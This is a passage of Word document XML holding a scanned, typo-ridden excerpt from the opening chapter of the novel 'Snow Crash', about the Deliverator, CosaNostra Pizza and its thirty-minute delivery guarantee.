          <w:p w14:paraId="1AD5718E" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> never pulled that gun in anger, or in fear. He pulled it once in Gila Highlands. Some punks in Gila Highlands, a fancy </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, wanted themselves a delivery, and they didn't want to pay for it. Thought they would impress the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> with a baseball bat. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> took out his gun, centered its laser doohickey on that poised Louisville Slugger, fired it. The recoil was immense, as though the weapon had blown up in his hand. The middle third of the baseball bat turned into a column of burning sawdust accelerating in all directions like a bursting star. Punk ended up holding this bat handle with milky smoke pouring out the end. Stupid look on his face. Didn't get nothing but trouble from the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="097203DF" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Since </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>then</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> has kept the gun in the glove compartment and relied, instead, on a matched set of samurai swords, which have always been his weapon of choice anyhow. The punks in Gila Highlands weren't afraid of the gun, so the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Dcliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> was forced to use it. But swords need no demonstrations.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="760B26B9" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> car has enough potential energy packed into its batteries to fire a pound of bacon into the Asteroid Belt. Unlike a bimbo box or a Burb beater, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> car unloads that power through gaping, gleaming, polished sphincters. When the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> puts the hammer down</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>, !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">@#$ happens. You want to talk contact patches? Your car's tires have tiny contact patches, talk to the asphalt in four places the size of your tongue. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> car has big sticky tires with contact patches the size of a fat lady's thighs. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is in touch with the road, starts like a bad day, stops on a peseta.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24D98790" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Why is the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> so equipped? Because people rely on him. He is a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>roll</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> model. This is America. People do whatever </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>the !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">@#$ they feel like doing, you got a problem with that? Because they have a right </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">. And because they have guns and no one </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>can !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">@#$ing stop them. As a result, this country has one of the worst economies in the world. When it gets down to it-talking trade balances here-once we've brain-drained all our technology into other countries, once things have evened out, they're </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>making</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="483258A2" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7F16F7" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">cars in Bolivia and microwave ovens in Tadzhikistan and selling them here-once our edge in natural resources has been made irrelevant by giant Hong Kong ships and dirigibles that can ship North Dakota all the way to New Zealand for a nickel-once the Invisible Hand has taken all those historical inequities </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>and smeared them out into a broad global layer of what a Pakistani brickmaker would consider to be prosperity-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>y'know</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> what? </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>There's</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> only four things we do better than anyone else</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA0F2F2" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4595195C" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>music</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03FACA8C" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>movies</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47391475" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>microcode (software)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D29DCC" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>high-speed pizza delivery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71FC9E62" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0354F870" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> used to make software. Still does, sometimes. But if life were a mellow elementary school run by well-meaning education </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Ph.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>D.s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> report card would say: "Hiro is so bright and creative but needs to work harder on his cooperation skills."</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DCB8447" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">So now he has this other job. No brightness or creativity involved-but no cooperation either. Just a single principle: The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> stands tall, your pie in thirty minutes or you can have it free, shoot the driver, take his car, file a class-action suit. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> has been working this job for six months, a rich and lengthy tenure by his standards, and has never delivered a pizza in more than twenty-one minutes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="339E7C5A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Oh, they used to argue over times, many corporate driver-years lost to it: homeowners, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>red.faced</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and sweaty with their own lies, stinking of Old Spice and job-related stress, standing in their glowing yellow doorways brandishing their </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Seikos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and waving at the clock over the kitchen sink, I swear, can't you guys tell time?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62154A1B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Didn't happen anymore. Pizza delivery </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>a major</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> industry. A managed industry. People went to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>University</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> four years just to learn it. Came in its doors unable to write an English sentence, from Abkhazia, Rwanda, Guanajuato, South Jersey, and came out knowing more about pizza than a Bedouin knows about sand. And they had studied this problem. Graphed the frequency of doorway delivery-time disputes. Wired the early </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverators</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to record, then analyze, the debating tactics, the</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C8DD9A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65EA3715" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">voice-stress histograms, the distinctive grammatical structures employed by white middle-class Type A </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> occupants who against all logic had decided that this was the place to take their personal </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Custerian</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> stand against all that was stale and deadening in their lives: they were going to lie, or delude themselves, about the time of their phone call and get themselves a free pizza; no, they deserved a free pizza along with their life, liberty, and pursuit of whatever, it was !@#$ing inalienable. Sent psychologists out to these people's houses, gave them a free TV set to submit to an anonymous interview, hooked them to polygraphs, studied their brain waves as they showed them choppy, inexplicable movies of porn queens and late-night car crashes and Sammy Davis, Jr., put them in sweet-smelling, mauve-walled rooms and asked them questions about Ethics so perplexing that even a Jesuit couldn't respond without committing a venial sin.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65500E2C" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The analysts at </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza University concluded that it was just human </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>nature</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and you couldn't fix it, and so they went for a quick cheap technical fix: smart boxes. The pizza box is a plastic carapace now, corrugated for stiffness, a little LED readout glowing on the side, telling the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> how many </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>trade</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> imbalance-producing minutes have ticked away since the fateful phone call. There are chips and stuff in there. The pizzas rest, a short stack of them, in slots behind the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> head. Each pizza glides into a slot like a circuit board into a computer, clicks into place as the smart box interfaces with the onboard system of the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> car. The address of the caller has already been inferred from his phone number and poured into the smart box's built-in RAM. From there it is communicated to the car, which computes and projects the optimal route on a heads-up display, a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>glowing colored</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> map traced out against the windshield so that the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deiverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> does not even have to glance down.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B3C9D41" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">If the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>thirty.minute</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> deadline expires, news of the disaster is flashed to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza Headquarters and relayed from there to Uncle Enzo himself-the Sicilian Colonel Sanders, the Andy Griffith of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Bensorihurst</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, the straight razor-swinging figment of many a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator's</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> nightmares, the Capo and prime figurehead of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Incorporated__who</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> will be on the phone to the customer within five minutes, apologizing profusely. The next day, Uncle Enzo will land on the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>customer's</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6F699656" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">yard in a jet helicopter and apologize some more and give him a free trip to Italy-all he </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>has to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> do is sign a bunch of releases that make him a public figure and spokesperson for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza and basically end his private life as he knows it. He will come away from the whole thing feeling that, somehow, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>be</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> owes the Mafia a favor.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B94546" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> does not know for sure what happens to the driver in such cases, but he has heard some rumors. Most pizza deliveries happen in the evening hours, which Uncle Enzo considers to be his private time. And how would you feel if you </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bad</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> to interrupt dinner with your family in order to call some obstreperous dork in a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> and grovel fora </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>late !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">@#$ing pizza? Uncle Enzo has not put in fifty years serving his family and his country so that, at the age when most are playing golf and bobbling their granddaughters, he can get out of the bathtub dripping wet and lie down and kiss the feet of some sixteen-year-old skate punk whose pepperoni was thirty-one minutes in coming. Oh, God. It makes the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> breathe a little shallower just to think of the idea.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EA354CA" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">But he wouldn't drive for </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza any other way.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF8925C" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">You know why? Because there's something about having your life on the line. It's like being a kamikaze pilot. Your mind is clear. Other people-store clerks, burger flippers, software engineers, the whole vocabulary of meaningless jobs that make up Life in America-other people just rely on plain old competition. Better </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ifip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> your burgers or debug your subroutines faster and better than your high school classmate two blocks down the strip is flipping or debugging, because we're in competition with those guys, and people notice these things.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D13D07B" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">What </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>a !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">@#$ing rat race that is. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza doesn't have any competition. Competition goes against the Mafia ethic. You don't work harder because you're competing against some identical operation down the street. You work harder because everything is on the line. Your name, your honor, your family, your life. Those burger flippers might have a better life expectancy- but what kind of life is it anyway, you </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>have to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> ask yourself. That's why nobody, not even the Nipponese, can move pizzas faster than </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">. The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is proud to wear the uniform, proud to drive the car, proud to march up the front walks of</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C31B84D" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A7855F6" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">innumerable </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> homes, a grim vision in ninja black, a pizza on his shoulder, red LED digits blazing proud numbers into the night: 12:32 or 15:15 or the occasional 20:43.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05869F1A" w14:textId="77777777" w:rsidR="00183FB3" w:rsidRDefault="00183FB3" w:rsidP="00183FB3">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Deliverator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> is assigned to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>CosaNostra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Pizza #3569 in the Valley. Southern California doesn't know whether to bustle or just strangle itself on the spot. Not enough roads for the number of people. Fairlanes, Inc. is laying new ones all the time. </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Have to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> bulldoze lots of neighborhoods to do it, but those seventies and eighties developments exist to be bulldozed, right? No sidewalks, no schools, no nothing. Don't have their own police force-no immigration control-undesirables can walk right in without being frisked or even harassed. Now </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Burbclave</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>, that's the place to live. A city-state with its own constitution, a border, laws, cops, everything.</w:t>
            </w:r>
